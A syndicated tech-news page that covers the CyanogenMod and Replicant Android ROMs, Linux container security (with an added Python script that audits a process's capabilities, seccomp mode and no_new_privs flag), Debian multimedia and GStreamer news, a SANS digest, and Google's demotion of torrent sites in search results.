CyanogenMod is one of the best and most popular FOSS Android variants. This is a complete replacement for Google’s Android, just like you can replace Debian with Ubuntu or Linux Mint. (Or Mint with Debian. Or whatever.) It is based on the Android Open Source Project.

All CyanogenMod source code is freely available on their GitHub repository. CyanogenMod supports bales of features including CPU overclocking, controlling permissions on apps, soft buttons, full tethering with no backtalk, easier Wi-Fi, Bluetooth, and GPS management, and absolutely no spyware, which seems to be the #1 purpose of most of the apps in the Play Store. CyanogenMod is more like a real Linux: completely open and modifiable.

CyanogenMod has a bunch of nice user-friendly features: a blacklist for blocking annoying callers, a quick setting ribbon for starting your favorite apps with one swipe, user-themeable, a customizable status bar, profiles for multiple users or multiple workflows, a customizable lockscreen…in short, a completely user-customizable interface. You get a superuser and unprivileged users, all just like your favorite Linux desktop.

CyanogenMod has been ported to a lot of devices, so chances are your phone or tablet is already supported. Amazon Kindle Fire, ASUS, Google Nexus, HTC, LG, Motorola, Samsung, Sony, and lots more. A large and active community supports CyanogenMod, and the Wiki contains bales of good documentation, including help for wannabe developers.

So how do you install CyanogenMod? Isn't that the scary part, where a mistake bricks your device? That is a real risk. So start with nothing-to-lose practice gadgets: look for some older used tablets and smartphones for cheap and practice on them. Don't risk your shiny new stuff until you've gained experience, and back up anything you care about before you start, because flashing a new ROM (and unlocking the bootloader, on devices that require it) normally wipes user data. Anyway, installation is not all that scary, as the good CyanogenMod people have built a super-nice reliable installer that does not require that you be a mighty guru. You don't need to root your phone because the installer does that for you. After installation the updater takes care of keeping your installation current.

Replicant

Replicant gets my vote for best name. Please treat yourself to a viewing of the movie "Blade Runner" if you don't get the reference. Even with a Free Android operating system, phones and tablets still use a lot of proprietary blobs, and one of the goals of Replicant is to replace these with Free software. Replicant was originally based on the Android Open Source Project, and then migrated to CyanogenMod to take advantage of their extensive device support. Replicant is a little more work to install, so you'll acquire a deeper knowledge of how to get software on devices that don't want you to. Replicant is sponsored by the Free Software Foundation.

The Google Play Store has over a million apps. This sounds impressive, but many of them are junk, most of them are devoted to data-mining you for all you’re worth, and how many Mine Sweeper and Mahjongg ripoffs do you need? Android is destined to be a streamlined general-purpose operating system for a multitude of portable low-power devices (coming to a refrigerator near you! Why? Because!), and this is a great time to get acquainted with it on a deeper level.

LWN.net: Garrett: Linux Container Security

This post was syndicated from: LWN.net and was written by: jake. Original post: at LWN.net

Matthew Garrett considers the security of Linux containers on his blog. While the attack surface of containers is likely to always be larger than that of hypervisors, that difference may not matter in practice, but it’s going to take some work to get there:

I suspect containers can be made sufficiently secure that the attack surface size doesn’t matter. But who’s going to do that work? As mentioned, modern container deployment tools make use of a number of kernel security features. But there’s been something of a dearth of contributions from the companies who sell container-based services. Meaningful work here would include things like:

  • Strong auditing and aggressive fuzzing of containers under realistic configurations
  • Support for meaningful nesting of Linux Security Modules in namespaces
  • Introspection of container state and (more difficult) the host OS itself in order to identify compromises

These aren’t easy jobs, but they’re important, and I’m hoping that the lack of obvious development in areas like this is merely a symptom of the youth of the technology rather than a lack of meaningful desire to make things better. But until things improve, it’s going to be far too easy to write containers off as a “convenient, cheap, secure: choose two” tradeoff. That’s not a winning strategy.
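The introspection Garrett asks for has to start with the state the kernel already exposes. As an added example (not code from the LWN post or from Garrett's blog), the Python below reads a process's /proc/<pid>/status and reports which of the confinement features container runtimes rely on are actually in force for it: the effective and bounding capability sets, the seccomp mode and the no_new_privs flag. Capability bit numbers follow the kernel's include/uapi/linux/capability.h. The two status texts embedded in it are constructed samples, one shaped like a process under a runtime's default capability set with a seccomp filter and no_new_privs, the other like an unconfined root process; the "high-risk" capability list is my own choice of what lets a container reach the host, not a list from the page.

```python
"""Report kernel confinement features for a process from /proc/<pid>/status.

Added example, not from the LWN post or Garrett's blog.  Capability numbers
follow include/uapi/linux/capability.h; the sample status texts are constructed.
"""
import sys

# Index in this list == capability bit number in CapEff/CapBnd.
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER",
    "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP",
    "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST",
    "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER",
    "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
    "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD",
    "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP",
    "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM",
    "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF",
    "CAP_CHECKPOINT_RESTORE",
]

# My own choice (assumption): capabilities that let a container reach the host
# (load modules, ptrace, raw devices, mounts, reading any file, admin the net).
HIGH_RISK = {"CAP_SYS_ADMIN", "CAP_SYS_PTRACE", "CAP_SYS_MODULE", "CAP_SYS_RAWIO",
             "CAP_NET_ADMIN", "CAP_DAC_READ_SEARCH", "CAP_BPF"}

# Constructed sample: default-style container profile (14 caps, seccomp filter, nnp).
DEFAULT_CONTAINER_STATUS = (
    "Name:\tnginx\nPid:\t4213\nUid:\t0\t0\t0\t0\n"
    "CapInh:\t0000000000000000\nCapPrm:\t00000000a80425fb\n"
    "CapEff:\t00000000a80425fb\nCapBnd:\t00000000a80425fb\n"
    "NoNewPrivs:\t1\nSeccomp:\t2\n"
)

# Constructed sample: unconfined root, every capability up to CAP_AUDIT_READ.
UNCONFINED_STATUS = (
    "Name:\tbash\nPid:\t4220\nUid:\t0\t0\t0\t0\n"
    "CapInh:\t0000000000000000\nCapPrm:\t0000003fffffffff\n"
    "CapEff:\t0000003fffffffff\nCapBnd:\t0000003fffffffff\n"
    "NoNewPrivs:\t0\nSeccomp:\t0\n"
)


def parse_status(text):
    """Turn the 'Key:<tab>value' lines of /proc/<pid>/status into a dict."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def decode_caps(mask):
    """Expand a CapEff/CapBnd bitmask into capability names, lowest bit first."""
    return [name for bit, name in enumerate(CAP_NAMES) if (mask >> bit) & 1]


def audit(fields):
    """Return a list of findings; an empty list means the process looks confined."""
    findings = []
    eff = int(fields.get("CapEff", "0"), 16)
    bnd = int(fields.get("CapBnd", fields.get("CapEff", "0")), 16)
    nnp = fields.get("NoNewPrivs", "0") == "1"
    seccomp = int(fields.get("Seccomp", "0"))   # 0 disabled, 1 strict, 2 filter

    risky = sorted(HIGH_RISK & set(decode_caps(eff)))
    if risky:
        findings.append("high-risk capabilities effective: " + ", ".join(risky))
    if seccomp == 0:
        findings.append("seccomp disabled: the full syscall surface is reachable")
    if not nnp:
        findings.append("no_new_privs not set: setuid/file-capability binaries can gain privilege")
        # Without no_new_privs, anything in the bounding set but not yet
        # effective can be regained through such a binary.
        extra = bnd & ~eff
        if extra:
            findings.append("bounding set exceeds effective set, regainable: "
                            + ", ".join(decode_caps(extra)))
    return findings


if __name__ == "__main__":
    pid = sys.argv[1] if len(sys.argv) > 1 else "self"
    try:
        with open("/proc/%s/status" % pid) as fh:   # Linux only
            text = fh.read()
    except OSError:
        text = UNCONFINED_STATUS   # fall back to the constructed sample off-Linux
    print("\n".join(audit(parse_status(text))) or "no findings")
```

Run it against a container's init PID from the host (or against /proc/self/status inside the container) to see whether the runtime's profile actually applied; it is a one-process snapshot, not the fuzzing or LSM-nesting work Garrett lists, but it is the kind of state a host-side monitor would compare against the expected profile.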

LWN.net: Bits from the Debian multimedia maintainers

This post was syndicated from: LWN.net and was written by: jake. Original post: at LWN.net

The Debian multimedia maintainers have put out a status report on multimedia software for the Debian 8.0 ("Jessie") release. It covers which frameworks, plugins, applications, and so on for multimedia processing will be included in the release, as well as packages that have been dropped. "The codec library libavcodec, which is used by popular media playback applications including vlc, mpv, totem (using gstreamer1.0-libav), xine, and many more, has been updated to the latest upstream release version 11 provided by Libav. This provides Debian users with HEVC playback, a native Opus decoder, Matroska 3D support, Apple ProRes, and much more. Please see libav-changelog for a full list of functionality additions and updates."

(Thanks to Paul Wise.)

LWN.net: Schaller: GStreamer Conference 2014 talks online

This post was syndicated from: LWN.net and was written by: jake. Original post: at LWN.net

On his blog, Christian Schaller announced the availability of videos from the recently completed GStreamer Conference. "For those of you who, like me, missed this year's GStreamer Conference, the recorded talks are now available online thanks to Ubicast. Ubicast has been a tremendous partner for GStreamer over the years, making sure we have high quality talk recordings online shortly after the conference ends. So be sure to check out this year's batch of great GStreamer talks."

SANS Internet Storm Center, InfoCON: green: Digest: 23 OCT 2014, (Thu, Oct 23rd)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

A number of items for your consideration today, readers. Thanks as always to our own Rob VandenBrink for pointing out a number of these.

In case you missed it, What's New in Windows PowerShell.

A new Snort release is available: Snort 2.9.7.

VMware has released a security advisory: VMSA-2014-0011 – VMware vSphere Data Protection product update addresses a critical information disclosure vulnerability.


(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Google’s New Search Downranking Hits Torrent Sites Hard

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

In recent years Hollywood and the music industry have taken a rather aggressive approach against Google. The entertainment industry companies have accused the search engine of not doing enough to limit piracy, and demanded more stringent anti-piracy measures.

One of the suggestions often made is the removal or demotion of pirate sites in search results. A lower ranking would lead fewer people to pirate sources and promoting legal sources would have a similar effect, rightsholders argue.

While Google already began changing the ranking of sites based on DMCA complaints in 2012, it announced more far-reaching demotion measures last week. According to Google the new algorithm changes would "visibly" lower the search rankings of the most notorious pirate sites, and they were right.

TorrentFreak has spoken with various torrent site owners who confirm that traffic from Google has been severely impacted by the recent algorithm changes. “Earlier this week all search traffic dropped in half,” the Isohunt.to team told us.

The drop is illustrated by a day-to-day traffic comparison before and after the changes were implemented, as shown below. The graph shows a significant loss in traffic which Isohunt.to solely attributes to Google’s recent changes.

[Figure: Torrent site traffic drop]

The downranking affects all sites that have a relatively high percentage of DMCA takedown requests. When Google users search for popular movie, music or software titles in combination with terms such as “download,” “watch” and “torrent”, these sites are demoted.

The new measures appear to be far more effective than previous search algorithm changes, and affect all major ‘pirate’ sites. Below is an overview of the SEO visibility of several large torrent sites in the UK and US, based on a list of 100 keywords.

[Figure: Google SEO visibility of torrent sites]

The true impact varies from site to site, depending on how much it relies on Google traffic. Confirming their earlier stance, The Pirate Bay team told TorrentFreak that they are not really concerned about the changes as they have relatively little traffic from Google.

“That Google is putting our links lower is in a way a good thing for us. We’ll get more direct traffic when people don’t get the expected search result when using Google, since they will go directly to TPB,” they said.

To get an idea of how the search results have changed we monitored a few search phrases that were likely to be affected. The before and after comparisons, which are only three days apart, show that popular ‘pirate sites’ have indeed disappeared.

A search for “Breaking Bad torrent” previously featured Kickass.to, Torrentz.eu and Isohunt.com on top, but these have all disappeared. Interestingly, in some cases their place has been taken by other less popular torrent sites.

[Figure: "Breaking Bad torrent", old results versus new]

The top torrent sites have also vanished from a search for the movie The Social Network. “The Social Network download” no longer shows results from Kickass.to, ThePirateBay.se and Movie4k.to but shows the IMDb profile on top instead.

[Figure: "The Social Network download", old results versus new]

Searches for music tracks have changed as well. The phrase "Eminem lose yourself mp3" no longer shows links to popular MP3 download sites such as MP3Skull.com, but points to legal sources and lesser known pirate sites.

[Figure: "Eminem lose yourself mp3", old results versus new]

The traffic data and search comparisons clearly show that Google’s latest downranking changes can have a severe impact on popular “pirate” sites. Ironically, the changes will also drive a lot of traffic to smaller unauthorized sources for the time being, but these will also be demoted as their takedown notice count increases.

Rinse and repeat.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.